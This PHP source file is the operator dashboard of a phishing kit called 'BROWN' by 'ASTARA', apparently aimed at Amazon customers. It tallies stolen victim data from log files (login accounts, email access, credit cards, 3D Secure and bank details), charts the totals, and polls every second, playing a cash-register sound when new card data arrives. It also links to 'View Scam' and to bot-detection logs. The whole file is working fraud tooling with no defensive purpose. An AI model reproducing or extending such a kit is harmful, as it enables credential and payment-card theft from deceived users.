<?php
error_reporting(0);
date_default_timezone_set("Asia/Jakarta");

$click = "../main/config/system/stats/log_visitor.txt";
$file = fopen($click, "r");
$total_click = fread($file, filesize($click));
$total_click = substr_count($total_click, "\n");
fclose($file);
if($total_click == 0) {
    $total_click = "$total_click";
}else{
    $total_click = "$total_click";
}

$click = "../main/config/system/stats/log_account.txt";
$file = fopen($click, "r");
$total_login = fread($file, filesize($click));
$total_login = substr_count($total_login, "\n");
fclose($file);
if($total_login == 0) {
    $total_login = "$total_login";
}else{
    $total_login = "$total_login";
}

$click = "../main/config/system/stats/log_email.txt";
$file = fopen($click, "r");
$total_email = fread($file, filesize($click));
$total_email = substr_count($total_email, "\n");
fclose($file);
if($total_email == 0) {
    $total_email = "$total_email";
}else{
    $total_email = "$total_email";
}

$click = "../main/config/system/stats/log_cc.txt";
$file = fopen($click, "r");
$total_cc = fread($file, filesize($click));
$total_cc = substr_count($total_cc, "\n");
fclose($file);
if($total_cc == 0) {
    $total_cc = "$total_cc";
}else{
    $total_cc = "$total_cc";
}

$click = "../main/config/system/stats/log_3dsecure.txt";
$file = fopen($click, "r");
$total_vbv = fread($file, filesize($click));
$total_vbv = substr_count($total_vbv, "\n");
fclose($file);
if($total_vbv == 0) {
    $total_vbv = "$total_vbv";
}else{
    $total_vbv = "$total_vbv";
}

$click = "../main/config/system/stats/log_bank.txt";
$file = fopen($click, "r");
$total_bank = fread($file, filesize($click));
$total_bank = substr_count($total_bank, "\n");
fclose($file);
if($total_bank == 0) {
    $total_bank = "$total_bank";
}else{
    $total_bank = "$total_bank";
}


$click = "../main/config/system/stats/log_robot.txt";
$file = fopen($click, "r");
$total_botnya = fread($file, filesize($click));
$total_botnya = substr_count($total_botnya, "\n");
fclose($file);
if($total_botnya == 0) {
    $total_botnya = "$total_botnya";
}else{
    $total_botnya = "$total_botnya";
}

$click = "../main/config/system/stats/log_visitor.txt";
$file = fopen($click, "r");
$visitor = fread($file, filesize($click));
fclose($file);

$click = "../main/config/system/stats/log_robot.txt";
$file = fopen($click, "r");
$log_bot = fread($file, filesize($click));
fclose($file);

$click = "../main/config/system/stats/log_clik.txt";
$file = fopen($click, "r");
$log_bin = fread($file, filesize($click));
fclose($file);

$file = "../main/config/system/private/setting.json";
$json = file_get_contents($file);
$json = json_decode($json,true);


?>

<!DOCTYPE html>
<html lang="en">

<head>

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta name="author" content="">

    <title>BROWN - Dashboard</title>
    <link rel = "icon" href = "css/basilisk.png" type = "image/x-icon"> 
    <!-- Custom fonts for this template-->
    <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
    <link
        href="https://fonts.googleapis.com/css?family=Nunito:200,200i,300,300i,400,400i,600,600i,700,700i,800,800i,900,900i"
        rel="stylesheet">

    <!-- Custom styles for this template-->
    <link href="css/sb-admin-2.min.css" rel="stylesheet">
    <script src="https://code.iconify.design/1/1.0.7/iconify.min.js"></script>

</head>
<script>
    window.onload = function() {
Chart.defaults.global.defaultFontFamily = 'Nunito', '-apple-system,system-ui,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif';
Chart.defaults.global.defaultFontColor = '#858796';

// Pie Chart Example
var ctx = document.getElementById("myPieChart");
var myPieChart = new Chart(ctx, {
  type: 'doughnut',
  data: {
    labels: ["Total Click", "Login Account", "Email Access", "Credit Card","Bank"],
    datasets: [{
      data: [<?= $total_click; ?>,<?= $total_login; ?>, <?= $total_email; ?>, <?= $total_cc; ?>, <?= $total_bank; ?>],
      backgroundColor: ['#f0ad4e', '#4e73df', '#1cc88a', '#df4759'],
      hoverBackgroundColor: ['#d69a45', '#2e59d9', '#17a673', '#d14354'],
      hoverBorderColor: "rgba(234, 236, 244, 1)",
    }],
  },
  options: {
    maintainAspectRatio: false,
    tooltips: {
      backgroundColor: "rgb(255,255,255)",
      bodyFontColor: "#858796",
      borderColor: '#dddfeb',
      borderWidth: 1,
      xPadding: 15,
      yPadding: 15,
      displayColors: false,
      caretPadding: 10,
    },
    legend: {
      display: false
    },
    cutoutPercentage: 80,
  },
});
chart.render();
 
}
</script>
<body id="page-top">

    <!-- Page Wrapper -->
    <div id="wrapper">

        <!-- Sidebar -->
        <ul class="navbar-nav bg-gradient-dark sidebar sidebar-dark accordion" id="accordionSidebar">

            <!-- Sidebar - Brand -->
            <a class="sidebar-brand d-flex align-items-center justify-content-center" href="#">
                <div class="sidebar-brand-icon">
                <i class="iconify fa-3x text-info" data-icon="ant-design:amazon-circle-filled"></i>
                </div>
                <div class="sidebar-brand-text mx-3">BROWN <sup>VIP <span class="iconify" data-icon="noto:crown" data-inline="false"></span></sup></div>
            </a>

            <!-- Divider -->
            <hr class="sidebar-divider my-0">

            <!-- Nav Item - Dashboard -->
            <li class="nav-item active">
                <a class="nav-link" href="index.php">
                    <i class="fas fa-fw fa-tachometer-alt"></i>
                    <span>Dashboard</span></a>
            </li>

            <!-- Divider -->
            <hr class="sidebar-divider">

            <!-- Heading -->
            <div class="sidebar-heading">
                Interface
            </div>

            <!-- Nav Item - Pages Collapse Menu -->
            <li class="nav-item">
                <a class="nav-link" href="setting.php">
                    <i class="fas fa-fw fa-cogs"></i>
                    <span>General Setting</span></a>
            </li>

            <!-- Divider -->
            <hr class="sidebar-divider">

            <!-- Heading -->
            <div class="sidebar-heading">
                Addons
            </div>

            <!-- Nav Item - Charts -->
            <li class="nav-item active">
                <a class="nav-link" href="visitor.php">
                    <i class="fas fa-fw fa-bug"></i>
                    <span>Visitor Detect</span></a>
            </li>


            <!-- Nav Item - Charts -->

            <!-- Nav Item - Tables -->
            <li class="nav-item">
                <a class="nav-link" href="clear.php">
                    <i class="fas fa-fw fa-trash-alt"></i>
                    <span>Clear logs</span></a>
            </li>

            <!-- Divider -->
            <hr class="sidebar-divider d-none d-md-block">

            <!-- Sidebar Toggler (Sidebar) -->
            <div class="text-center d-none d-md-inline">
                <button class="rounded-circle border-0" id="sidebarToggle"></button>
            </div>

            <!-- Sidebar Message -->
            <div class="sidebar-card">
                <img class="sidebar-card-illustration mb-2" src="img/undraw_rocket.svg" alt="">
                <p class="text-center mb-2 text-white"><strong>BROWN</strong> make sure what's belong to you is yours!</p>
                <a class="btn btn-dark btn-sm" href="#">By ASTARA</a>
            </div>

        </ul>
        <!-- End of Sidebar -->

        <!-- Content Wrapper -->
        <div id="content-wrapper" class="d-flex flex-column">

            <!-- Main Content -->
            <div id="content">

                <!-- Topbar -->
                <nav class="navbar navbar-expand navbar-dark bg-dark topbar mb-4 static-top shadow">

                    <!-- Sidebar Toggle (Topbar) -->
                    <button id="sidebarToggleTop" class="btn btn-link d-md-none rounded-circle mr-3">
                        <i class="fa fa-bars"></i>
                    </button>

                    <!-- Topbar Navbar -->
                    <ul class="navbar-nav ml-auto">

                        <div class="topbar-divider d-none d-sm-block"></div>

                        <!-- Nav Item - User Information -->
                        <li class="nav-item dropdown no-arrow">
                            <a class="nav-link dropdown-toggle" href="#" id="userDropdown" role="button"
                                data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                                <span class="mr-2 d-none d-lg-inline text-gray-600 small"><font color="white">BROWN-X-ASTARA</font></span>
                                <img class="img-profile rounded-circle"
                                    src="img/undraw_profile.svg">
                            </a>
                            <!-- Dropdown - User Information -->
                            <div class="dropdown-menu dropdown-menu-right shadow animated--grow-in"
                                aria-labelledby="userDropdown">
                                <a class="dropdown-item" target="_blank" href="https://<?php echo $_SERVER['SERVER_NAME']; ?>/main?<?=$json['parameter']; ?>">
                                    <i class="fas fa-sign-out-alt fa-sm fa-fw mr-2 text-red-400"></i>
                                    View Scam
                                </a>
                                <a class="dropdown-item" href="logout.php">
                                    <i class="fas fa-sign-out-alt fa-sm fa-fw mr-2 text-red-400"></i>
                                    logout
                                </a>
                            </div>
                        </li>

                    </ul>

                </nav>
                <!-- End of Topbar -->

                <!-- Begin Page Content -->
                <div class="container-fluid">

                    <!-- Page Heading -->
                    <div class="d-sm-flex align-items-center justify-content-between mb-4">
                        <h1 class="h3 mb-0 text-gray-800">Dashboard <span class="iconify" data-icon="fxemoji:crown" data-inline="false"></span></h1>
                    </div>

                    <!-- Content Row -->
                    <div class="row">

                    <div class="col-xl-4 col-md-6 mb-4">
                            <div class="card border-left-warning shadow h-100 py-2">
                                <div class="card-body">
                                    <div class="row no-gutters align-items-center">
                                        <div class="col mr-2">
                                            <div class="text-md font-weight-bold text-warning text-uppercase mb-1">
                                                Total Click</div>
                                            <div class="h4 mb-0 font-weight-bold text-gray-800"><span id="total_click"><?php echo $total_click ?></span>
                                            </div>
                                        </div>
                                        <div class="col-auto">
                                        <i class="fas fa-mouse-pointer text-warning fa-3x"></i>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <!-- Earnings (Monthly) Card Example -->
                        <div class="col-xl-4 col-md-6 mb-4">
                            <div class="card border-left-primary shadow h-100 py-2">
                                <div class="card-body">
                                    <div class="row no-gutters align-items-center">
                                        <div class="col mr-2">
                                            <div class="text-md font-weight-bold text-primary text-uppercase mb-1">
                                                Login Account</div>
                                            <div class="h4 mb-0 font-weight-bold text-gray-800"><span id="total_login"><?php echo $total_login ?></span>
                                            </div>
                                        </div>
                                        <div class="col-auto">
                                        <i class="fas fa-sign-in-alt text-primary fa-3x"></i>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>

                        <!-- Earnings (Monthly) Card Example -->
                        <div class="col-xl-4 col-md-6 mb-4">
                            <div class="card border-left-success shadow h-100 py-2">
                                <div class="card-body">
                                    <div class="row no-gutters align-items-center">
                                        <div class="col mr-2">
                                        <div class="text-md font-weight-bold text-success text-uppercase mb-1">
                                                Login Account 2</div>
                                            <div class="h4 mb-0 font-weight-bold text-gray-800"><span id="total_email"><?php echo $total_email ?></span></div>
                                        </div>
                                        <div class="col-auto">
                                        <i class="fas fa-envelope text-success fa-3x"></i>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <!-- Earnings (Monthly) Card Example -->
                        <div class="col-xl-4 col-md-6 mb-4">
                            <div class="card border-left-danger shadow h-100 py-2">
                                <div class="card-body">
                                    <div class="row no-gutters align-items-center">
                                        <div class="col mr-2">
                                        <div class="text-md font-weight-bold text-danger text-uppercase mb-1">
                                                Credit Card</div>
                                            <div class="h4 mb-0 font-weight-bold text-gray-800"><span id="total_cc"><?php echo $total_cc ?></span></div>
                                        </div>
                                        <div class="col-auto">
                                        <i class="fas fa-credit-card text-danger fa-3x"></i>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>

                        <!-- Pending Requests Card Example -->
                        <div class="col-xl-4 col-md-6 mb-4">
                            <div class="card border-left-secondary shadow h-100 py-2">
                                <div class="card-body">
                                    <div class="row no-gutters align-items-center">
                                        <div class="col mr-2">
                                            <div class="text-md font-weight-bold text-dark text-uppercase mb-1">
                                                Total BOT</div>
                                            <div class="h4 mb-0 font-weight-bold text-gray-800"><span id="total_botnya"><?php echo $total_botnya ?></span></div>
                                        </div>
                                        <div class="col-auto">
                                        <i class="fas fa-user-times text-dark fa-3x"></i>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>

                    </div>

                    <div class="row">

                        <!-- Pie Chart -->
                        <div class="col-xl col-lg-5">
                            <div class="card shadow mb-4">
                                <!-- Card Header - Dropdown -->
                                <div
                                    class="card-header py-3 d-flex flex-row align-items-center justify-content-between">
                                    <h6 class="m-0 font-weight-bold text-primary">Presentase Result</h6>
                                </div>
                                <!-- Card Body -->
                                <div class="card-body">
                                    <div class="chart-pie pt-4 pb-2">
                                        <canvas id="myPieChart"></canvas>
                                    </div>
                                    <div class="mt-4 text-center small">
                                        <span class="mr-2">
                                            <i class="fas fa-mouse-pointer text-warning"></i> Total Click
                                        </span>
                                        <span class="mr-2">
                                            <i class="fas fa-sign-in-alt text-primary"></i> Login Account
                                        </span>
                                        <span class="mr-2">
                                            <i class="fas fa-envelope text-success"></i> Login Account 2
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>

                        </div>

                        
                    </div>

                </div>
                <!-- /.container-fluid -->

            </div>
            <!-- End of Main Content -->

            <!-- Footer -->
            <footer class="sticky-footer bg-dark">
                <div class="container my-auto">
                    <div class="copyright text-center my-auto text-light">
                        <span>Copyright &copy; BROWN by ASTARA</span>
                    </div>
                </div>
            </footer>
            <!-- End of Footer -->

        </div>
        <!-- End of Content Wrapper -->

    </div>
    <!-- End of Page Wrapper -->

    <!-- Scroll to Top Button-->
    <a class="scroll-to-top rounded" href="#page-top">
        <i class="fas fa-angle-up"></i>
    </a>

    <!-- Bootstrap core JavaScript-->
    <script src="vendor/jquery/jquery.min.js"></script>
    <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
    
 <script>
        var audio = new Audio('vendor/mixkit-bell-notification-933.wav');
        var audioCC = new Audio('vendor/cash-register-01.wav');
        var old_total_click = 0;
        set_total_click_old();
        set_total_login_old();
        set_total_email_old();
        set_total_cc_old();
        set_total_bank_old();
        set_total_vbv_old();
        set_total_botnya_old();

        function get_total_click(){
            $.ajax({    //create an ajax request to display.php
                type: "GET",
                url: "get_total_click.php",
                dataType: "html",   //expect html to be returned
                success: function(response){
                    if(old_total_click != response){
                         $("#total_click").text(response);
                        old_total_click = response;
                        audio.play();
                    }
                    
                }
            });
        }
        
        function set_total_click_old(){
            $.ajax({    //create an ajax request to display.php
                type: "GET",
                url: "get_total_click.php",
                dataType: "html",   //expect html to be returned
                success: function(response){
                    old_total_click = response;
                    
                }
            });
        }

        function get_total_login(){
            $.ajax({    //create an ajax request to display.php
                type: "GET",
                url: "get_total_login.php",
                dataType: "html",   //expect html to be returned
                success: function(response){
                    if(old_total_login != response){
                         $("#total_login").text(response);
                        old_total_login = response;
                        audio.play();
                    }
                    
                }
            });
        }
        
        function set_total_login_old(){
            $.ajax({    //create an ajax request to display.php
                type: "GET",
                url: "get_total_login.php",
                dataType: "html",   //expect html to be returned
                success: function(response){
                    old_total_login = response;
                    
                }
            });
        }

        function get_total_email(){
            $.ajax({    //create an ajax request to display.php
                type: "GET",
                url: "get_total_email.php",
                dataType: "html",   //expect html to be returned
                success: function(response){
                    if(old_total_email != response){
                         $("#total_email").text(response);
                        old_total_email = response;
                        audio.play();
                    }
                    
                }
            });
        }
        
        function set_total_email_old(){
            $.ajax({    //create an ajax request to display.php
                type: "GET",
                url: "get_total_email.php",
                dataType: "html",   //expect html to be returned
                success: function(response){
                    old_total_email = response;
                    
                }
            });
        }

        function get_total_cc(){
        $.ajax({    //create an ajax request to display.php
            type: "GET",
            url: "get_total_cc.php",
            dataType: "html",   //expect html to be returned
            success: function(response){
                if(old_total_cc != response){
                     $("#total_cc").text(response);
                    old_total_cc = response;
                    audioCC.play(); // Memutar suara 'cashier.wav'
                }
                    
                }
            });
        }
        
        function set_total_cc_old(){
            $.ajax({    //create an ajax request to display.php
                type: "GET",
                url: "get_total_cc.php",
                dataType: "html",   //expect html to be returned
                success: function(response){
                    old_total_cc = response;
                    
                }
            });
        }


        function get_total_vbv(){
            $.ajax({    //create an ajax request to display.php
                type: "GET",
                url: "get_total_vbv.php",
                dataType: "html",   //expect html to be returned
                success: function(response){
                    if(old_total_vbv != response){
                         $("#total_vbv").text(response);
                        old_total_vbv = response;
                        audio.play();
                    }
                    
                }
            });
        }
        
        function set_total_vbv_old(){
            $.ajax({    //create an ajax request to display.php
                type: "GET",
                url: "get_total_vbv.php",
                dataType: "html",   //expect html to be returned
                success: function(response){
                    old_total_vbv = response;
                    
                }
            });
        }


        function get_total_bank(){
            $.ajax({    //create an ajax request to display.php
                type: "GET",
                url: "get_total_bank.php",
                dataType: "html",   //expect html to be returned
                success: function(response){
                    if(old_total_bank != response){
                         $("#total_bank").text(response);
                        old_total_bank = response;
                        audio.play();
                    }
                    
                }
            });
        }
        
        function set_total_bank_old(){
            $.ajax({    //create an ajax request to display.php
                type: "GET",
                url: "get_total_bank.php",
                dataType: "html",   //expect html to be returned
                success: function(response){
                    old_total_bank = response;
                    
                }
            });
        }
 
        function get_total_botnya(){
            $.ajax({    //create an ajax request to display.php
                type: "GET",
                url: "get_total_botnya.php",
                dataType: "html",   //expect html to be returned
                success: function(response){
                    if(old_total_botnya != response){
                         $("#total_botnya").text(response);
                        old_total_botnya = response;
                        audio.play();
                    }
                    
                }
            });
        }
        
        function set_total_botnya_old(){
            $.ajax({    //create an ajax request to display.php
                type: "GET",
                url: "get_total_botnya.php",
                dataType: "html",   //expect html to be returned
                success: function(response){
                    old_total_botnya = response;
                    
                }
            });
        }
        function startClock() {
            get_total_click();
            get_total_login();
            get_total_email();
            get_total_cc();
            get_total_vbv();
            get_total_bank();
            get_total_botnya();
            setTimeout(startClock, 1000);
        }
            startClock();
    </script>
    <!-- Core plugin JavaScript-->
    <script src="vendor/jquery-easing/jquery.easing.min.js"></script>

    <!-- Custom scripts for all pages-->
    <script src="js/sb-admin-2.min.js"></script>

    <!-- Page level plugins -->
    <script src="vendor/chart.js/Chart.min.js"></script>

    <!-- Page level custom scripts -->
    <script src="js/demo/chart-area-demo.js"></script>
    <script src="https://canvasjs.com/assets/script/canvasjs.min.js"></script>
</body>

</html>